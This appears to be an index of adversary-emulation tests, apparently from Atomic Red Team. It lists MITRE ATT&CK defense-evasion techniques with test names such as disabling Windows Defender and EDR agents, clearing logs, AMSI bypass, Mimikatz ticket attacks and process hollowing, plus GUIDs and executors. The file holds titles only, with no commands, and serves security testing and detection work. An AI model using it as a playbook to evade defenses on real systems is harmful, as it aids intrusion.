220 defense-evasion T1112 Modify Registry 43 DisallowRun Execution Of Certain Applications 71db768a-5a9c-4047-b5e7-59e01f188e84 command_prompt
221 defense-evasion T1112 Modify Registry 44 Enabling Restricted Admin Mode via Command_Prompt fe7974e5-5813-477b-a7bd-311d4f535e83 command_prompt
222 defense-evasion T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
223 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 1 Pad Binary to Change Hash - Linux/macOS dd ffe2346c-abd5-4b45-a713-bf5f1ebd573a sh
224 defense-evasion T1484.001 Domain Policy Modification: Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
225 defense-evasion T1484.001 Domain Policy Modification: Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
226 defense-evasion T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
227 defense-evasion T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
228 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
229 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
230 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
231 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 1 Clear Logs e6abb60e-26b8-41da-8aae-0c35174b0967 command_prompt
232 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 2 Delete System Logs Using Clear-EventLog b13e9306-3351-4b4b-a6e8-477358b0b498 powershell
233 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 3 Clear Event Logs via VBA 1b682d84-f075-4f93-9a89-8a8de19ffd6e powershell
234 defense-evasion T1134.002 Create Process with Token 1 Access Token Manipulation dbf4f5a9-b8e0-46a3-9841-9ad71247239e powershell
235 defense-evasion T1134.002 Create Process with Token 2 WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique ccf4ac39-ec93-42be-9035-90e2f26bcd92 powershell
236 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
237 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
238 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
239 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 4 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
240 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 5 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
241 defense-evasion T1218.008 Signed Binary Proxy Execution: Odbcconf 1 Odbcconf.exe - Execute Arbitrary DLL 2430498b-06c0-4b92-a448-8ad263c388e2 command_prompt
242 defense-evasion T1218.008 Signed Binary Proxy Execution: Odbcconf 2 Odbcconf.exe - Load Response File 331ce274-f9c9-440b-9f8c-a1006e1fce0b command_prompt
243 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 1 Auditing Configuration Changes on Linux Host 212cfbcf-4770-4980-bc21-303e37abd0e3 bash
244 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 2 Logging Configuration Changes on Linux Host 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c bash
245 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 3 Disable Powershell ETW Provider - Windows 6f118276-121d-4c09-bb58-a8fb4a72ee84 powershell
246 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 4 Disable .NET Event Tracing for Windows Via Registry (cmd) 8a4c33be-a0d3-434a-bee6-315405edbd5b command_prompt
247 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 5 Disable .NET Event Tracing for Windows Via Registry (powershell) 19c07a45-452d-4620-90ed-4c34fffbe758 powershell
248 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 6 LockBit Black - Disable the ETW Provider of Windows Defender -cmd f6df0b8e-2c83-44c7-ba5e-0fa4386bec41 command_prompt
249 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 7 LockBit Black - Disable the ETW Provider of Windows Defender -Powershell 69fc085b-5444-4879-8002-b24c8e1a3e02 powershell
250 defense-evasion T1070 Indicator Removal on Host 1 Indicator Removal using FSUtil b4115c7a-0e92-47f0-a61e-17e7218b2435 command_prompt
251 defense-evasion T1550.003 Use Alternate Authentication Material: Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
252 defense-evasion T1550.003 Use Alternate Authentication Material: Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
253 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 1 Creating W32Time similar named service using schtasks f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 command_prompt
254 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 2 Creating W32Time similar named service using sc b721c6ef-472c-4263-a0d9-37f1f4ecff66 command_prompt
255 defense-evasion T1055.004 Process Injection: Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
256 defense-evasion T1647 Plist File Modification 1 Plist Modification 394a538e-09bb-4a4a-95d1-b93cf12682a8 manual
257 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 1 Mount ISO image 002cca30-4778-4891-878a-aaffcfa502fa powershell
258 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 2 Mount an ISO image and run executable from the ISO 42f22b00-0242-4afc-a61b-0da05041f9cc powershell
259 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 3 Remove the Zone.Identifier alternate data stream 64b12afc-18b8-4d3f-9eab-7f6cae7c73f9 powershell
260 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 4 Execute LNK file from ISO c2587b8d-743d-4985-aa50-c83394eaeb68 powershell
261 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 1 Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject 1483fab9-4f52-4217-a9ce-daa9d7747cae command_prompt
262 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 2 Mshta executes VBScript to execute malicious command 906865c3-e05f-4acc-85c4-fbc185455095 command_prompt
263 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 3 Mshta Executes Remote HTML Application (HTA) c4b97eeb-5249-4455-a607-59f95485cb45 powershell
264 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 4 Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement 007e5672-2088-4853-a562-7490ddc19447 powershell
265 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 5 Invoke HTML Application - Jscript Engine Simulating Double Click 58a193ec-131b-404e-b1ca-b35cf0b18c33 powershell
266 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 6 Invoke HTML Application - Direct download from URI 39ceed55-f653-48ac-bd19-aceceaf525db powershell
267 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 7 Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler e7e3a525-7612-4d68-a5d3-c4649181b8af powershell
268 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 8 Invoke HTML Application - JScript Engine with Inline Protocol Handler d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 powershell
269 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 9 Invoke HTML Application - Simulate Lateral Movement over UNC Path b8a8bdb2-7eae-490d-8251-d5e0295b2362 powershell
270 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 10 Mshta used to Execute PowerShell 8707a805-2b76-4f32-b1c0-14e558205772 command_prompt
271 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
272 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
273 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 3 Launch NSudo Executable 7be1bc0f-d8e5-4345-9333-f5f67d742cb9 powershell
274 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 4 Bad Potato 9c6d799b-c111-4749-a42f-ec2f8cb51448 powershell
275 defense-evasion T1564.002 Hide Artifacts: Hidden Users 1 Create Hidden User using UniqueID < 500 4238a7f0-a980-4fff-98a2-dfc0a363d507 sh
276 defense-evasion T1564.002 Hide Artifacts: Hidden Users 2 Create Hidden User using IsHidden option de87ed7b-52c3-43fd-9554-730f695e7f31 sh
277 defense-evasion T1564.002 Hide Artifacts: Hidden Users 3 Create Hidden User in Registry 173126b7-afe4-45eb-8680-fa9f6400431c command_prompt
278 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
279 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 2 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
280 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
281 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
282 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 3 Parent PID Spoofing - Spawn from Specified Process cbbff285-9051-444a-9d17-c07cd2d230eb powershell
283 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 4 Parent PID Spoofing - Spawn from svchost.exe e9f2b777-3123-430b-805d-5cedc66ab591 powershell
284 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
285 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 1 Compiled HTML Help Local Payload 5cb87818-0d7c-4469-b7ef-9224107aebe8 command_prompt
286 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 2 Compiled HTML Help Remote Payload 0f8af516-9818-4172-922b-42986ef1e81d command_prompt
287 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 3 Invoke CHM with default Shortcut Command Execution 29d6f0d7-be63-4482-8827-ea77126c1ef7 powershell
288 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 4 Invoke CHM with InfoTech Storage Protocol Handler b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 powershell
289 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 5 Invoke CHM Simulate Double click 5decef42-92b8-4a93-9eb2-877ddcb9401a powershell
290 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 6 Invoke CHM with Script Engine and Help Topic 4f83adda-f5ec-406d-b318-9773c9ca92e5 powershell
291 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 7 Invoke CHM Shortcut Command with ITS and Help Topic 15756147-7470-4a83-87fb-bb5662526247 powershell
292 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 8 Decompile Local CHM File 20cb05e0-1fa5-406d-92c1-84da4ba01813 command_prompt
293 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 1 Add Network Share 14c38f32-6509-46d8-ab43-d53e32d2b131 command_prompt
294 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 2 Remove Network Share 09210ad5-1ef2-4077-9ad3-7351e13e9222 command_prompt
295 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 3 Remove Network Share PowerShell 0512d214-9512-4d22-bde7-f37e058259b3 powershell
296 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 4 Disable Administrative Share Creation at Startup 99c657aa-ebeb-4179-a665-69288fdd12b8 command_prompt
297 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 5 Remove Administrative Shares 4299eff5-90f1-4446-b2f3-7f4f5cfd5d62 command_prompt
298 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 1 Disable syslog 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 sh
299 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 2 Disable Cb Response ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 sh
300 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 3 Disable SELinux fc225f36-9279-4c39-b3f9-5141ab74f8d8 sh
301 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 4 Stop Crowdstrike Falcon on Linux 828a1278-81cc-4802-96ab-188bf29ca77d sh
302 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 5 Disable Carbon Black Response 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c sh
303 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 6 Disable LittleSnitch 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 sh
304 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 7 Disable OpenDNS Umbrella 07f43b33-1e15-4e99-be70-bc094157c849 sh
305 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 8 Disable macOS Gatekeeper 2a821573-fb3f-4e71-92c3-daac7432f053 sh
306 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 9 Stop and unload Crowdstrike Falcon on macOS b3e7510c-2d4c-4249-a33f-591a2bc83eef sh
307 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 10 Unload Sysmon Filter Driver 811b3e76-c41b-430c-ac0d-e2380bfaa164 command_prompt
308 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 11 Uninstall Sysmon a316fb2e-5344-470d-91c1-23e15c374edc command_prompt
309 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 12 AMSI Bypass - AMSI InitFailed 695eed40-e949-40e5-b306-b4031e4154bd powershell
310 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 13 AMSI Bypass - Remove AMSI Provider Reg Key 13f09b91-c953-438e-845b-b585e51cac9b powershell
311 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 14 Disable Arbitrary Security Windows Service a1230893-56ac-4c81-b644-2108e982f8f5 command_prompt
312 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 15 Tamper with Windows Defender ATP PowerShell 6b8df440-51ec-4d53-bf83-899591c9b5d7 powershell
313 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 16 Tamper with Windows Defender Command Prompt aa875ed4-8935-47e2-b2c5-6ec00ab220d2 command_prompt
314 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 17 Tamper with Windows Defender Registry 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45 powershell
315 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 18 Disable Microsoft Office Security Features 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7 powershell
316 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 19 Remove Windows Defender Definition Files 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 command_prompt
317 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 20 Stop and Remove Arbitrary Security Windows Service ae753dda-0f15-4af6-a168-b9ba16143143 powershell
318 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 21 Uninstall Crowdstrike Falcon on Windows b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297 powershell
319 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 22 Tamper with Windows Defender Evade Scanning -Folder 0b19f4ee-de90-4059-88cb-63c800c683ed powershell
320 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 23 Tamper with Windows Defender Evade Scanning -Extension 315f4be6-2240-4552-b3e1-d1047f5eecea powershell
321 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 24 Tamper with Windows Defender Evade Scanning -Process a123ce6a-3916-45d6-ba9c-7d4081315c27 powershell
322 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 25 office-365-Disable-AntiPhishRule b9bbae2c-2ba6-4cf3-b452-8e8f908696f3 powershell
323 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 26 Disable Windows Defender with DISM 871438ac-7d6e-432a-b27d-3e7db69faf58 command_prompt
324 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 27 Disable Defender with Defender Control 178136d8-2778-4d7a-81f3-d517053a4fd6 powershell
325 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 28 Disable Defender Using NirSoft AdvancedRun 81ce22fd-9612-4154-918e-8a1f285d214d powershell
326 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 29 Kill antimalware protected processes using Backstab 24a12b91-05a7-4deb-8d7f-035fa98591bc powershell
327 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 30 WinPwn - Kill the event log services for stealth 7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66 powershell
328 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 31 Tamper with Windows Defender ATP using Aliases - PowerShell c531aa6e-9c97-4b29-afee-9b7be6fc8a64 powershell
329 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 32 LockBit Black - Disable Privacy Settings Experience Using Registry -cmd d6d22332-d07d-498f-aea0-6139ecb7850e command_prompt
330 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 33 LockBit Black - Use Registry Editor to turn on automatic logon -cmd 9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70 command_prompt
331 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 34 LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell d8c57eaa-497a-4a08-961e-bd5efd7c9374 powershell
332 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 35 Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell 5e27f36d-5132-4537-b43b-413b0d5eec9a powershell
333 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 36 Disable Windows Defender with PwSh Disable-WindowsOptionalFeature f542ffd3-37b4-4528-837f-682874faa012 powershell
334 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 37 WMIC Tamper with Windows Defender Evade Scanning Folder 59d386fc-3a4b-41b8-850d-9e3eee24dfe4 command_prompt
335 defense-evasion T1055.012 Process Injection: Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
336 defense-evasion T1055.012 Process Injection: Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
337 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
338 defense-evasion T1027 Obfuscated Files or Information 2 Execute base64-encoded PowerShell a50d5a97-2531-499e-a1de-5544c74432c6 powershell
339 defense-evasion T1027 Obfuscated Files or Information 3 Execute base64-encoded PowerShell from Windows Registry 450e7218-7915-4be4-8b9b-464a49eafcec powershell
340 defense-evasion T1027 Obfuscated Files or Information 4 Execution from Compressed File f8c8a909-5f29-49ac-9244-413936ce6d1f command_prompt
341 defense-evasion T1027 Obfuscated Files or Information 5 DLP Evasion via Sensitive Data in VBA Macro over email 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad powershell
342 defense-evasion T1027 Obfuscated Files or Information 6 DLP Evasion via Sensitive Data in VBA Macro over HTTP e2d85e66-cb66-4ed7-93b1-833fc56c9319 powershell
343 defense-evasion T1027 Obfuscated Files or Information 7 Obfuscated Command in PowerShell 8b3f4ed6-077b-4bdd-891c-2d237f19410f powershell
344 defense-evasion T1027 Obfuscated Files or Information 8 Obfuscated Command Line using special Unicode characters e68b945c-52d0-4dd9-a5e8-d173d70c448f manual
345 defense-evasion T1564.006 Run Virtual Instance 1 Register Portable Virtualbox c59f246a-34f8-4e4d-9276-c295ef9ba0dd command_prompt
346 defense-evasion T1564.006 Run Virtual Instance 2 Create and start VirtualBox virtual machine 88b81702-a1c0-49a9-95b2-2dd53d755767 command_prompt
347 defense-evasion T1564.006 Run Virtual Instance 3 Create and start Hyper-V virtual machine fb8d4d7e-f5a4-481c-8867-febf13f8b6d3 powershell
348 defense-evasion T1134.005 Access Token Manipulation: SID-History Injection 1 Injection SID-History with mimikatz 6bef32e5-9456-4072-8f14-35566fb85401 command_prompt
349 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 1 Regsvr32 local COM scriptlet execution 449aa403-6aba-47ce-8a37-247d21ef0306 command_prompt
350 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 2 Regsvr32 remote COM scriptlet execution c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 command_prompt
351 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 3 Regsvr32 local DLL execution 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b command_prompt
352 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 4 Regsvr32 Registering Non DLL 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 command_prompt
353 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 5 Regsvr32 Silent DLL Install Call DllRegisterServer 9d71c492-ea2e-4c08-af16-c6994cdf029f command_prompt
354 defense-evasion T1036.003 Masquerading: Rename System Utilities 1 Masquerading as Windows LSASS process 5ba5a3d1-cf3c-4499-968a-a93155d1f717 command_prompt
355 defense-evasion T1036.003 Masquerading: Rename System Utilities 2 Masquerading as Linux crond process. a315bfff-7a98-403b-b442-2ea1b255e556 sh
356 defense-evasion T1036.003 Masquerading: Rename System Utilities 3 Masquerading - cscript.exe running as notepad.exe 3a2a578b-0a01-46e4-92e3-62e2859b42f0 command_prompt
357 defense-evasion T1036.003 Masquerading: Rename System Utilities 4 Masquerading - wscript.exe running as svchost.exe 24136435-c91a-4ede-9da1-8b284a1c1a23 command_prompt
358 defense-evasion T1036.003 Masquerading: Rename System Utilities 5 Masquerading - powershell.exe running as taskhostw.exe ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa command_prompt
359 defense-evasion T1036.003 Masquerading: Rename System Utilities 6 Masquerading - non-windows exe running as windows exe bc15c13f-d121-4b1f-8c7d-28d95854d086 powershell
360 defense-evasion T1036.003 Masquerading: Rename System Utilities 7 Masquerading - windows exe running as different windows exe c3d24a39-2bfe-4c6a-b064-90cd73896cb0 powershell
361 defense-evasion T1036.003 Masquerading: Rename System Utilities 8 Malicious process Masquerading as LSM.exe 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f command_prompt
362 defense-evasion T1036.003 Masquerading: Rename System Utilities 9 File Extension Masquerading c7fa0c3b-b57f-4cba-9118-863bf4e653fc command_prompt
363 defense-evasion T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
364 defense-evasion T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm 1 Regasm Uninstall Method Call Test 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 command_prompt
365 defense-evasion T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm 2 Regsvcs Uninstall Method Call Test fd3c1c6a-02d2-4b72-82d9-71c527abb126 powershell
366 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 1 Install root CA on CentOS/RHEL 9c096ec4-fd42-419d-a762-d64cc950627e sh
367 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 2 Install root CA on Debian/Ubuntu 53bcf8a0-1549-4b85-b919-010c56d724ff sh
368 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 3 Install root CA on macOS cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 sh
369 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 4 Install root CA on Windows 76f49d86-5eb1-461a-a032-a480f86652f1 powershell
370 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 5 Install root CA on Windows with certutil 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f powershell
371 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 6 Add Root Certificate to CurrentUser Certificate Store ca20a3f1-42b5-4e21-ad3f-1049199ec2e0 powershell
372 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 1 Compile After Delivery using csc.exe ffcdbd6a-b0e8-487d-927a-09127fe9a206 command_prompt
373 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 2 Dynamic C# Compile 453614d8-3ba6-4147-acc0-7ec4b3e1faef powershell
374 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 3 C compile d0377aa6-850a-42b2-95f0-de558d80be57 bash
375 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 4 CC compile da97bb11-d6d0-4fc1-b445-e443d1346efe bash
376 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 5 Go compile 78bd3fa7-773c-449e-a978-dc1f1500bc52 bash
377 defense-evasion T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
378 defense-evasion T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
379 defense-evasion T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
380 defense-evasion T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
381 defense-evasion T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild 1 MSBuild Bypass Using Inline Tasks (C#) 58742c0f-cb01-44cd-a60b-fb26e8871c93 command_prompt
382 defense-evasion T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild 2 MSBuild Bypass Using Inline Tasks (VB) ab042179-c0c5-402f-9bc8-42741f5ce359 command_prompt
383 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 1 AWS - CloudTrail Changes 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e sh
384 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 2 Azure - Eventhub Deletion 5e09bed0-7d33-453b-9bf3-caea32bff719 powershell
385 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 3 Office 365 - Exchange Audit Log Disabled 1ee572f3-056c-4632-a7fc-7e7c42b1543c powershell
386 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 4 AWS - Disable CloudTrail Logging Through Event Selectors using Stratus a27418de-bdce-4ebd-b655-38f11142bf0c sh
387 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 5 AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus 22d89a2f-d475-4895-b2d4-68626d49c029 sh
388 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 6 AWS - Remove VPC Flow Logs using Stratus 93c150f5-ad7b-4ee3-8992-df06dec2ac79 sh
389 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 7 AWS - CloudWatch Log Group Deletes 89422c87-b57b-4a04-a8ca-802bb9d06121 sh
390 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 8 AWS - CloudWatch Log Stream Deletes 89422c87-b57b-4a04-a12a-802bb11d06121 sh
391 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 9 AWS CloudWatch Log Stream Deletes 33ca84bc-4259-4943-bd36-4655dc420932 sh
392 defense-evasion T1564.003 Hide Artifacts: Hidden Window 1 Hidden Window f151ee37-9e2b-47e6-80e4-550b9f999b7a powershell
393 defense-evasion T1027.006 HTML Smuggling 1 HTML Smuggling Remote Payload 30cbeda4-08d9-42f1-8685-197fad677734 powershell
394 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 1 Delete a single file - Linux/macOS 562d737f-2fc6-4b09-8c2a-7f8ff0828480 sh
395 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 2 Delete an entire folder - Linux/macOS a415f17e-ce8d-4ce2-a8b4-83b674e7017e sh
396 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 3 Overwrite and delete a file with shred 039b4b10-2900-404b-b67f-4b6d49aa6499 sh
397 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 4 Delete a single file - Windows cmd 861ea0b4-708a-4d17-848d-186c9c7f17e3 command_prompt
398 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 5 Delete an entire folder - Windows cmd ded937c4-2add-42f7-9c2c-c742b7a98698 command_prompt
399 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 6 Delete a single file - Windows PowerShell 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 powershell
